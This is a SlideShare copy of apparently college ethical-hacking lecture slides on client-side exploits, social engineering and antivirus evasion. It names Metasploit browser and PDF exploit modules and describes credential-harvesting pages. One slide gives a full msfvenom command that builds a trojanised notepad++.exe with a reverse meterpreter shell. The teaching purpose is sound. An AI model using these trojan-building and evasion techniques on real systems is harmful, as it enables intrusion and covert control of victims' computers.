SlideShare a Scribd company logo

CNIT 124 Ch10-12: Local Exploits through Bypassing AV

Sam Bowne, profile picture
Sam Bowne

The document discusses client-side exploitation techniques in ethical hacking, focusing on vulnerabilities present in user software such as web browsers and document viewers. It highlights methods like social engineering, browser and PDF exploits, as well as strategies for bypassing security measures like antivirus applications. Techniques such as payload delivery through various ports and manipulating user actions are emphasized, alongside tools like Metasploit for executing these attacks.

Education
1 of 59
Downloaded 54 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation Rev. 10-26-17
Low-Hanging Fruit • The weakest defenders have these sorts of problems – Vulnerable services listening on network ports – Unchanged default passwords – Misconfigured web servers
Defenses • Install all security patches • Audit passwords and remove easily- guessed or easily–cracked ones • Control user roles – Regular users don't have administrative rights on their workstations – Software is installed and maintained by the security staff
Other Attacks • That don't require direct network access • Target local software—not listening on a network port • Payloads – Bind shell won't work, because such systems are behind firewalls – Reverse connections may work
Topics • Bypassing Filters with Metasploit Payloads • Client-Side Attacks – Browser Exploitation – Running Scripts in a Meterpreter Session – PDF Exploits – Java Exploits – browser_autopwn
Bypassing Filters with Metasploit Payloads
All Ports • Filters may not allow an outgoing connection to port 4444 (Metasploit's reverse_tcp default) – But it may allow connections to ports 80 or 443 • reverse_tcp_allports payload will try all ports – First it tries LPORT, then all other ports – May cause target application to hang for a long time
HTTP and HTTPS Payloads • Traffic follows HTTP and HTTPS specifications • Packet-based, not stream-based like TCP payloads • Interrupted sessions can recover and reconnect
Proxy Servers • HTTP and HTTPS payloads use the Internet Explorer proxy settings – May fail when running as SYSTEM because those proxy settings are not defined • reverse_http_proxy payload allows the attacker to manually specify proxy settings
Client-Side Attacks
Local Attacks • Attacking Web browsers, document viewers, music players, etc. – Create malicious file – Trick user into opening it on the target system – Then the machine makes a connection back to the attacker • Such attacks are more important in penetration tests – Because more companies are finding and fixing network-listening vulnerabilities
Attacking Through NAT • Workstations and mobile devices typically lack a public IP address – They cannot be directly attacked – But they can still make outgoing connections to the attacker (reverse) – BUT it all relies on social engineering – Target must open a file, or click a link
Browser Exploitation
Malicious Web Page • Get user to visit a malicious Web page • Hijack execution in the browser and execute a payload
Aurora Attack • Chinese hackers used it against Google, Adobe, and Yahoo! • A zero-day IE vulnerability – After this attack, Google switched to Chrome • Metasploit module – exploit/windows/browser/ms10_002_aurora
Running Scripts in a Meterpreter Session
Normal IE Attack • Start a malicious Web server
Open the Malicious Page
Own the Target
Meterpreter Lives in a Process • Terminating this process kills the Meterpreter session
Migrate Script
Info About Migrate
AutoRunScript
Explorer.exe • Draws the desktop and the Start button • Runs until the user logs out
PDF Exploits
Adobe Reader Vulns • Not as many as there used to be – Link Ch 10a
Adobe PDF Embedded EXE Social Engineering • Not considered a coding error to be patched • A feature of Adobe Reader that can be abused • exploit/windows/fileformat/ adobe_pdf_embedded_exe • Does not work on Adobe Reader 8.12 on Windows Server 2008 • Does not work in Adobe Reader DC on Win 7
Vulnerable Form • Link Ch 10b
Warning Message
CNIT 124 Ch10-12: Local Exploits through Bypassing AV
Java Exploits
Multiplatform • Java is very popular because the same code can be run in a Java Virtual Machine on any platform – Windows, Mac, Linux, Android • Therefore exploitation is also multiplatform • Must trick user into opening a malicious URL
Warning Message
Nothing Very Recent
browser_autopwn
Start All The Modules
20 Modules
Results • IE 11 on Win 7: FAILS because I don't have Java installed • Firefox 41.0 on Win7 FAILS • Chrome 46.0.2490.80 on Win 7 FAILS
IE 7 on Win Server 2008
IE 7 on Win Server 2008
IE 7 on Win Server 2008
IE 7 on Win Server 2008
 FAILS
CNIT 124: Advanced Ethical Hacking Ch 11: Social Engineering
Spear-Phishing Attacks
Many Attack Options
CNIT 124 Ch10-12: Local Exploits through Bypassing AV
Gmail Blocks It • Default Metasploit payloads are blocked by virus scanners
Web Attacks
Web Attack Options
Attack Explanations • "Metasploit Browser Expoit Method" is like browser_autopwn • Credential Harvester makes fake login pages • Tabnapping says "Please Wait" and when the user clicks on another tab, changes to a fake login page
Broken in Kali 2 • The update option is broken • You can force an update (link Ch 11a) • But even then, Credential Harvester is broken – Because it uses /var/www instead of /var/ www/html
CNIT 124: Advanced Ethical Hacking Ch 12: Bypassing Antivirus Applications
Trojans • Add malware to existing executables with msfvenom • Only works with files that don't check integrity with hash values or signatures • msfvenom -p windows/meterpreter/ reverse_tcp LHOST=192.168.119.130 LPORT=2345 -x /root/Desktop/notepad+ +.exe -k -f exe > evilnotepad++.exe
AV • This trojan works on Win 7, but many AV products catch it
Encoding • Metasploit includes encoding engines, like shikata_ga_nai, but the AV vendors are on to them and they actually make the trojan more detectable
Cross-Compiling • You can export the malware as C code and compile it, adding a random value – Still, almost as many AV vendors catch it • Exporting malware as Python and then compiling it on Windows to an EXE worked well for me a couple of years ago – Clumsy process, produces large EXE files
Encrypting with Hyperion • Hyperion encrypts the file with AES, and with a key drawn from a small portion of the possible keyspace • Then deletes the key • When run, it brute-forces the key • This fooled Microsoft Security Essentials, but not many other AV engines
Veil-Evasion • Big, powerful program • Takes a while to install on Kali • Results are not impressive
CNIT 124 Ch10-12: Local Exploits through Bypassing AV

More Related Content

PDF
CNIT 124 Ch 13: Post Exploitation (Part 1)
Sam Bowne
 
PDF
Ch 10: Attacking Back-End Components
Sam Bowne
 
PDF
CNIT 123 Ch 10: Hacking Web Servers
Sam Bowne
 
PDF
CNIT 129S Ch 4: Mapping the Application
Sam Bowne
 
PDF
Ch 3: Web Application Technologies
Sam Bowne
 
PDF
CNIT 127: 8: Windows overflows (Part 2)
Sam Bowne
 
PDF
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
Sam Bowne
 
PDF
CNIT 126: Ch 2 & 3
Sam Bowne
 
CNIT 124 Ch 13: Post Exploitation (Part 1)
Sam Bowne
 
Ch 10: Attacking Back-End Components
Sam Bowne
 
CNIT 123 Ch 10: Hacking Web Servers
Sam Bowne
 
CNIT 129S Ch 4: Mapping the Application
Sam Bowne
 
Ch 3: Web Application Technologies
Sam Bowne
 
CNIT 127: 8: Windows overflows (Part 2)
Sam Bowne
 
CNIT 129S Ch 9: Attacking Data Stores (Part 2 of 2)
Sam Bowne
 
CNIT 126: Ch 2 & 3
Sam Bowne
 

What's hot (20)

PDF
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
PDF
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
PDF
Ch 10: Hacking Web Servers
Sam Bowne
 
PDF
CNIT 126 11. Malware Behavior
Sam Bowne
 
PDF
CNIT 126 Ch 11: Malware Behavior
Sam Bowne
 
PDF
CNIT 129: 6. Attacking Authentication
Sam Bowne
 
PDF
CNIT 129S - Ch 3: Web Application Technologies
Sam Bowne
 
PDF
CNIT 126: 10: Kernel Debugging with WinDbg
Sam Bowne
 
PDF
CNIT 128 9. Writing Secure Android Applications
Sam Bowne
 
PDF
CNIT 127: L9: Web Templates and .NET
Sam Bowne
 
PDF
CNIT 129S: 9: Attacking Data Stores (Part 1 of 2)
Sam Bowne
 
PDF
CNIT 128 3. Attacking iOS Applications (Part 2)
Sam Bowne
 
PDF
CNIT 128: 3. Attacking iOS Applications (Part 2)
Sam Bowne
 
PDF
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
Sam Bowne
 
PDF
CNIT 123: 6: Enumeration
Sam Bowne
 
PDF
Ch 9 Attacking Data Stores (Part 2)
Sam Bowne
 
PDF
Practical Malware Analysis Ch 14: Malware-Focused Network Signatures
Sam Bowne
 
PDF
CNIT 128 8. Android Implementation Issues (Part 3)
Sam Bowne
 
PDF
Ch 6: Attacking Authentication
Sam Bowne
 
PDF
Ch 8: Desktop and Server OS Vulnerabilites
Sam Bowne
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
Ch 10: Hacking Web Servers
Sam Bowne
 
CNIT 126 11. Malware Behavior
Sam Bowne
 
CNIT 126 Ch 11: Malware Behavior
Sam Bowne
 
CNIT 129: 6. Attacking Authentication
Sam Bowne
 
CNIT 129S - Ch 3: Web Application Technologies
Sam Bowne
 
CNIT 126: 10: Kernel Debugging with WinDbg
Sam Bowne
 
CNIT 128 9. Writing Secure Android Applications
Sam Bowne
 
CNIT 127: L9: Web Templates and .NET
Sam Bowne
 
CNIT 129S: 9: Attacking Data Stores (Part 1 of 2)
Sam Bowne
 
CNIT 128 3. Attacking iOS Applications (Part 2)
Sam Bowne
 
CNIT 128: 3. Attacking iOS Applications (Part 2)
Sam Bowne
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
Sam Bowne
 
CNIT 123: 6: Enumeration
Sam Bowne
 
Ch 9 Attacking Data Stores (Part 2)
Sam Bowne
 
Practical Malware Analysis Ch 14: Malware-Focused Network Signatures
Sam Bowne
 
CNIT 128 8. Android Implementation Issues (Part 3)
Sam Bowne
 
Ch 6: Attacking Authentication
Sam Bowne
 
Ch 8: Desktop and Server OS Vulnerabilites
Sam Bowne
 
Ad

Similar to CNIT 124 Ch10-12: Local Exploits through Bypassing AV (20)

PDF
White Lightning Sept 2014
Bryce Kunz
 
PPT
Web Hacking
Information Technology
 
PPTX
Client side exploits
nickyt8
 
PDF
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
PDF
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
 
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
PDF
Client-Side Penetration Testing Presentation
Chris Gates
 
PPTX
Finalppt metasploit
devilback
 
PPTX
Hacker tooltalk: Social Engineering Toolkit (SET)
Chris Hammond-Thrasher
 
PDF
Hacker halted2
samsniderheld
 
PDF
Metasploitation part-1 (murtuja)
ClubHack
 
PDF
Pen-Testing with Metasploit
Mohammed Danish Amber
 
DOCX
Backtrack Manual Part9
Nutan Kumar Panda
 
PDF
24 33 -_metasploit
wozgeass
 
PDF
Metasploit Computer security testing tool
medoelkang600
 
PDF
Compromising windows 8 with metasploit’s exploit
IOSR Journals
 
PDF
Layer8 exploitation: Lock'n Load Target
Prathan Phongthiproek
 
PDF
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
PPTX
Metasploit
Lalith Sai
 
PPTX
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
White Lightning Sept 2014
Bryce Kunz
 
Web Hacking
Information Technology
 
Client side exploits
nickyt8
 
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
 
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
Client-Side Penetration Testing Presentation
Chris Gates
 
Finalppt metasploit
devilback
 
Hacker tooltalk: Social Engineering Toolkit (SET)
Chris Hammond-Thrasher
 
Hacker halted2
samsniderheld
 
Metasploitation part-1 (murtuja)
ClubHack
 
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Backtrack Manual Part9
Nutan Kumar Panda
 
24 33 -_metasploit
wozgeass
 
Metasploit Computer security testing tool
medoelkang600
 
Compromising windows 8 with metasploit’s exploit
IOSR Journals
 
Layer8 exploitation: Lock'n Load Target
Prathan Phongthiproek
 
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
Metasploit
Lalith Sai
 
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
Ad

More from Sam Bowne (20)

PDF
Introduction to the Class & CISSP Certification
Sam Bowne
 
PDF
Cyberwar
Sam Bowne
 
PDF
3: DNS vulnerabilities
Sam Bowne
 
PDF
8. Software Development Security
Sam Bowne
 
PDF
4 Mapping the Application
Sam Bowne
 
PDF
3. Attacking iOS Applications (Part 2)
Sam Bowne
 
PDF
12 Elliptic Curves
Sam Bowne
 
PDF
11. Diffie-Hellman
Sam Bowne
 
PDF
2a Analyzing iOS Apps Part 1
Sam Bowne
 
PDF
9 Writing Secure Android Applications
Sam Bowne
 
PDF
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
PDF
10 RSA
Sam Bowne
 
PDF
12 Investigating Windows Systems (Part 1 of 3
Sam Bowne
 
PDF
9. Hard Problems
Sam Bowne
 
PDF
8 Android Implementation Issues (Part 1)
Sam Bowne
 
PDF
11 Analysis Methodology
Sam Bowne
 
PDF
8. Authenticated Encryption
Sam Bowne
 
PDF
7. Attacking Android Applications (Part 2)
Sam Bowne
 
PDF
7. Attacking Android Applications (Part 1)
Sam Bowne
 
PDF
5. Stream Ciphers
Sam Bowne
 
Introduction to the Class & CISSP Certification
Sam Bowne
 
Cyberwar
Sam Bowne
 
3: DNS vulnerabilities
Sam Bowne
 
8. Software Development Security
Sam Bowne
 
4 Mapping the Application
Sam Bowne
 
3. Attacking iOS Applications (Part 2)
Sam Bowne
 
12 Elliptic Curves
Sam Bowne
 
11. Diffie-Hellman
Sam Bowne
 
2a Analyzing iOS Apps Part 1
Sam Bowne
 
9 Writing Secure Android Applications
Sam Bowne
 
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
10 RSA
Sam Bowne
 
12 Investigating Windows Systems (Part 1 of 3
Sam Bowne
 
9. Hard Problems
Sam Bowne
 
8 Android Implementation Issues (Part 1)
Sam Bowne
 
11 Analysis Methodology
Sam Bowne
 
8. Authenticated Encryption
Sam Bowne
 
7. Attacking Android Applications (Part 2)
Sam Bowne
 
7. Attacking Android Applications (Part 1)
Sam Bowne
 
5. Stream Ciphers
Sam Bowne
 

Recently uploaded (20)

PDF
Black Hat USA 2025 - Micro ICS Summit - ICS/OT Threat Landscape
Chris Sistrunk
 
PPTX
Final Presentation General Medicine 03-08-2024.pptx
ZaheerAhmad228692
 
PPTX
PPT- ENG7_QUARTER1_LESSON1_WEEK1. IMAGERY -DESCRIPTIONS pptx.pptx
KMDee
 
PPTX
Renaissance Architecture: A Journey from Faith to Humanism
DrMonicaSharma
 
PDF
Pre independence Education in Inndia.pdf
goofy5603
 
PPTX
human mycosis Human fungal infections are called human mycosis..pptx
shilpa939953
 
PPTX
Cell Types and Its function , kingdom of life
ClaireMangundayao1
 
PPTX
GDM (1) (1).pptx small presentation for students
shrawanbpkihs
 
PPTX
PPH.pptx obstetrics and gynecology in nursing
SrideviDevaraj5
 
PDF
O7-L3 Supply Chain Operations - ICLT Program
labyankof
 
PDF
Anesthesia in Laparoscopic Surgery in India
mohitsuren827
 
PDF
Insiders guide to clinical Medicine.pdf
AbhishekPatil315128
 
PDF
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
jahanzaibmughal6
 
PDF
01-Introduction-to-Information-Management.pdf
PrinceIbarra
 
PDF
Basic Mud Logging Guide for educational purpose
wdandworks
 
PDF
Classroom Observation Tools for Teachers
Nicaramirez
 
PDF
Supply Chain Operations Speaking Notes -ICLT Program
labyankof
 
PDF
Computing-Curriculum for Schools in Ghana
abigailanane203
 
PDF
FourierSeries-QuestionsWithAnswers(Part-A).pdf
Raji Murugan
 
PDF
Saundersa Comprehensive Review for the NCLEX-RN Examination.pdf
sreejithcareers
 
Black Hat USA 2025 - Micro ICS Summit - ICS/OT Threat Landscape
Chris Sistrunk
 
Final Presentation General Medicine 03-08-2024.pptx
ZaheerAhmad228692
 
PPT- ENG7_QUARTER1_LESSON1_WEEK1. IMAGERY -DESCRIPTIONS pptx.pptx
KMDee
 
Renaissance Architecture: A Journey from Faith to Humanism
DrMonicaSharma
 
Pre independence Education in Inndia.pdf
goofy5603
 
human mycosis Human fungal infections are called human mycosis..pptx
shilpa939953
 
Cell Types and Its function , kingdom of life
ClaireMangundayao1
 
GDM (1) (1).pptx small presentation for students
shrawanbpkihs
 
PPH.pptx obstetrics and gynecology in nursing
SrideviDevaraj5
 
O7-L3 Supply Chain Operations - ICLT Program
labyankof
 
Anesthesia in Laparoscopic Surgery in India
mohitsuren827
 
Insiders guide to clinical Medicine.pdf
AbhishekPatil315128
 
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
jahanzaibmughal6
 
01-Introduction-to-Information-Management.pdf
PrinceIbarra
 
Basic Mud Logging Guide for educational purpose
wdandworks
 
Classroom Observation Tools for Teachers
Nicaramirez
 
Supply Chain Operations Speaking Notes -ICLT Program
labyankof
 
Computing-Curriculum for Schools in Ghana
abigailanane203
 
FourierSeries-QuestionsWithAnswers(Part-A).pdf
Raji Murugan
 
Saundersa Comprehensive Review for the NCLEX-RN Examination.pdf
sreejithcareers
 

CNIT 124 Ch10-12: Local Exploits through Bypassing AV

  • 1. CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation Rev. 10-26-17
  • 2. Low-Hanging Fruit • The weakest defenders have these sorts of problems – Vulnerable services listening on network ports – Unchanged default passwords – Misconfigured web servers
  • 3. Defenses • Install all security patches • Audit passwords and remove easily- guessed or easily–cracked ones • Control user roles – Regular users don't have administrative rights on their workstations – Software is installed and maintained by the security staff
  • 4. Other Attacks • That don't require direct network access • Target local software—not listening on a network port • Payloads – Bind shell won't work, because such systems are behind firewalls – Reverse connections may work
  • 5. Topics • Bypassing Filters with Metasploit Payloads • Client-Side Attacks – Browser Exploitation – Running Scripts in a Meterpreter Session – PDF Exploits – Java Exploits – browser_autopwn
  • 7. All Ports • Filters may not allow an outgoing connection to port 4444 (Metasploit's reverse_tcp default) – But it may allow connections to ports 80 or 443 • reverse_tcp_allports payload will try all ports – First it tries LPORT, then all other ports – May cause target application to hang for a long time
  • 8. HTTP and HTTPS Payloads • Traffic follows HTTP and HTTPS specifications • Packet-based, not stream-based like TCP payloads • Interrupted sessions can recover and reconnect
  • 9. Proxy Servers • HTTP and HTTPS payloads use the Internet Explorer proxy settings – May fail when running as SYSTEM because those proxy settings are not defined • reverse_http_proxy payload allows the attacker to manually specify proxy settings
  • 11. Local Attacks • Attacking Web browsers, document viewers, music players, etc. – Create malicious file – Trick user into opening it on the target system – Then the machine makes a connection back to the attacker • Such attacks are more important in penetration tests – Because more companies are finding and fixing network-listening vulnerabilities
  • 12. Attacking Through NAT • Workstations and mobile devices typically lack a public IP address – They cannot be directly attacked – But they can still make outgoing connections to the attacker (reverse) – BUT it all relies on social engineering – Target must open a file, or click a link
  • 14. Malicious Web Page • Get user to visit a malicious Web page • Hijack execution in the browser and execute a payload
  • 15. Aurora Attack • Chinese hackers used it against Google, Adobe, and Yahoo! • A zero-day IE vulnerability – After this attack, Google switched to Chrome • Metasploit module – exploit/windows/browser/ms10_002_aurora
  • 16. Running Scripts in a Meterpreter Session
  • 17. Normal IE Attack • Start a malicious Web server
  • 20. Meterpreter Lives in a Process • Terminating this process kills the Meterpreter session
  • 24. Explorer.exe • Draws the desktop and the Start button • Runs until the user logs out
  • 26. Adobe Reader Vulns • Not as many as there used to be – Link Ch 10a
  • 27. Adobe PDF Embedded EXE Social Engineering • Not considered a coding error to be patched • A feature of Adobe Reader that can be abused • exploit/windows/fileformat/ adobe_pdf_embedded_exe • Does not work on Adobe Reader 8.12 on Windows Server 2008 • Does not work in Adobe Reader DC on Win 7
  • 32. Multiplatform • Java is very popular because the same code can be run in a Java Virtual Machine on any platform – Windows, Mac, Linux, Android • Therefore exploitation is also multiplatform • Must trick user into opening a malicious URL
  • 36. Start All The Modules
  • 38. Results • IE 11 on Win 7: FAILS because I don't have Java installed • Firefox 41.0 on Win7 FAILS • Chrome 46.0.2490.80 on Win 7 FAILS
  • 39. IE 7 on Win Server 2008
  • 40. IE 7 on Win Server 2008
  • 41. IE 7 on Win Server 2008
  • 42. IE 7 on Win Server 2008
 FAILS
  • 43. CNIT 124: Advanced Ethical Hacking Ch 11: Social Engineering
  • 47. Gmail Blocks It • Default Metasploit payloads are blocked by virus scanners
  • 50. Attack Explanations • "Metasploit Browser Expoit Method" is like browser_autopwn • Credential Harvester makes fake login pages • Tabnapping says "Please Wait" and when the user clicks on another tab, changes to a fake login page
  • 51. Broken in Kali 2 • The update option is broken • You can force an update (link Ch 11a) • But even then, Credential Harvester is broken – Because it uses /var/www instead of /var/ www/html
  • 52. CNIT 124: Advanced Ethical Hacking Ch 12: Bypassing Antivirus Applications
  • 53. Trojans • Add malware to existing executables with msfvenom • Only works with files that don't check integrity with hash values or signatures • msfvenom -p windows/meterpreter/ reverse_tcp LHOST=192.168.119.130 LPORT=2345 -x /root/Desktop/notepad+ +.exe -k -f exe > evilnotepad++.exe
  • 54. AV • This trojan works on Win 7, but many AV products catch it
  • 55. Encoding • Metasploit includes encoding engines, like shikata_ga_nai, but the AV vendors are on to them and they actually make the trojan more detectable
  • 56. Cross-Compiling • You can export the malware as C code and compile it, adding a random value – Still, almost as many AV vendors catch it • Exporting malware as Python and then compiling it on Windows to an EXE worked well for me a couple of years ago – Clumsy process, produces large EXE files
  • 57. Encrypting with Hyperion • Hyperion encrypts the file with AES, and with a key drawn from a small portion of the possible keyspace • Then deletes the key • When run, it brute-forces the key • This fooled Microsoft Security Essentials, but not many other AV engines
  • 58. Veil-Evasion • Big, powerful program • Takes a while to install on Kali • Results are not impressive